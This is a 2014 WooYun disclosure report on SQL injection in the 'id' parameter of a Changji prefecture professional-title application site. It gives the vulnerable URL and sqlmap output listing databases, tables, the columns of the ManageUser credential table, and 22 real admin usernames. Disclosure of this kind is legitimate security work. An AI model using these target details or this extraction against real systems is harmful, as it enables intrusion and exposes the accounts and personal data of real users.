当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-063811

漏洞标题:昌吉州专业技术职务任职资格申报系统SQL注入

相关厂商:昌吉人才网

漏洞作者: RedFree

提交时间:2014-06-14 15:23

修复时间:2014-07-29 15:24

公开时间:2014-07-29 15:24

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-14: 细节已通知厂商并且等待厂商处理中
2014-06-19: 厂商已经确认,细节仅向厂商公开
2014-06-29: 细节向核心白帽子及相关领域专家公开
2014-07-09: 细节向普通白帽子公开
2014-07-19: 细节向实习白帽子公开
2014-07-29: 细节向公众公开

简要描述:

昌吉州专业技术职务任职资格申报系统公示信息参数过滤不严导致SQL注入

详细说明:

http://zc.cjrc.com.cn/modules/universe/ArticleDetail.aspx?id=13 参数“id”过滤不严致SQL注入。

web server operating system: Windows 2008
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2012
[21:00:53] [INFO] fetching database names
[21:00:53] [WARNING] reflective value(s) found and filtering out
[21:00:53] [INFO] the SQL query used returns 8 entries
[21:00:53] [INFO] retrieved: "humanresources"
[21:00:54] [INFO] retrieved: "master"
[21:00:54] [INFO] retrieved: "model"
[21:00:54] [INFO] retrieved: "msdb"
[21:00:55] [INFO] retrieved: "ReportServer"
[21:00:55] [INFO] retrieved: "ReportServerTempDB"
[21:00:56] [INFO] retrieved: "talents"
[21:00:56] [INFO] retrieved: "tempdb"
available databases [8]:
[*] humanresources
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] talents
[*] tempdb


Database: humanresources
[98 tables]
+---------------------------------+
| Acc_Album |
| Acc_Photo |
| Article |
| ArticleType |
| DefenceGroup |
| Dic_ComputerClass |
| Dic_ComputerSubject |
| Dic_County |
| Dic_DefenceLang |
| Dic_DefenceResult |
| Dic_Degree |
| Dic_Education |
| Dic_ForbitWord |
| Dic_ForeignLangClass |
| Dic_ForeignLangClass |
| Dic_HealthStatus |
| Dic_Major |
| Dic_MajorType |
| Dic_MaritalStatus |
| Dic_Nation |
| Dic_PoliticalStatus |
| Dic_Prefecture |
| Dic_ProVerify_Item |
| Dic_ProVerify_NoPassReason |
| Dic_Profession_Level |
| Dic_Profession_Level |
| Dic_Profession_Major |
| Dic_Profession_Series |
| Dic_Province |
| Dic_ReviewGroup |
| Dic_RewardsClass |
| Dic_RewardsLevel |
| Dic_SchoolType |
| Dic_SchoolYear |
| Dic_SkillGrade |
| Dic_SubjectSegment |
| Dic_TeacherCertificate |
| Dic_TrainType |
| Dic_Unit |
| Dic_UnitType |
| Document |
| DocumentType |
| Expert |
| Fields |
| ManageGroup |
| ManageUser |
| Msg |
| MsgType |
| PExpert_Education |
| PExpert_Education |
| PExpert_Pro_BreakRule |
| PExpert_Profession |
| PExpert_TrainExperience |
| PExpert_WorkExperience |
| PSave_Education |
| PSave_Education |
| PSave_Pro_BreakRule |
| PSave_Profession |
| PSave_TrainExperience |
| PSave_WorkExperience |
| Personal_AcademicCommunity |
| Personal_AcademicCommunity |
| Personal_Certificate |
| Personal_ComputerScore |
| Personal_Education |
| Personal_ForeignLanguage |
| Personal_Pro_BreakRule |
| Personal_Pro_CertificateReissue |
| Personal_Pro_QualificationReg |
| Personal_Profession |
| Personal_Rewards |
| Personal_SocialActivities |
| Personal_TeachingWork |
| Personal_TrainExperience |
| Personal_WorkExperience |
| Personal_WorkPerformance |
| Personal_Writing |
| ReviewerMark |
| ReviewerMark |
| SysFunction |
| SysInfomation |
| SysLog |
| VArticle |
| VCertificate |
| VDefenceNote |
| VExpertProfession_ori |
| VExpertProfession_ori |
| VExpertProfession_ori |
| VMsg |
| VPersonal |
| VPro_Education |
| VPro_TrainExperience |
| VPro_WorkExperience |
| VProfession |
| VReviewerMark |
| VSaveProfession |
| VerifyConfig |
| testXML |
+---------------------------------+

漏洞证明:

Database: humanresources
Table: ManageUser
[26 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| Answer | nvarchar |
| Authflag | int |
| Authstr | nvarchar |
| Authtime | nchar |
| CountyID | nchar |
| Email | nvarchar |
| GroupExpiryDate | nchar |
| ID | decimal |
| IsOnline | int |
| LateIP | nvarchar |
| LateTime | nvarchar |
| LoginCount | int |
| Mobile | nvarchar |
| MsgNumNew | int |
| MsgSound | int |
| Password | nvarchar |
| Phone | nvarchar |
| Question | nvarchar |
| RegDate | nvarchar |
| RegIp | nvarchar |
| State | int |
| TemplateID | decimal |
| TrueName | nvarchar |
| UnitID | decimal |
| UserGroupID | decimal |
| UserName | nvarchar |
+-----------------+----------+


Database: humanresources
Table: ManageUser
[22 entries]
+------------+
| UserName |
+------------+
| cjs |
| cjsgl |
| cjsrczx |
| cjzjyj |
| cjzz |
| cxh |
| fks |
| fksgl |
| htbx |
| htbxgl |
| jmsex |
| jmsexgl |
| liuyong |
| mlx |
| mlxgl |
| mnsx |
| mnsxgl |
| mqs |
| qtx |
| qtxgl |
| scf |
| supervisor |
+------------+

修复方案:

严格过滤参数

版权声明:转载请注明来源 RedFree@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2014-06-19 14:22

厂商回复:

通知处理中

最新状态:

暂无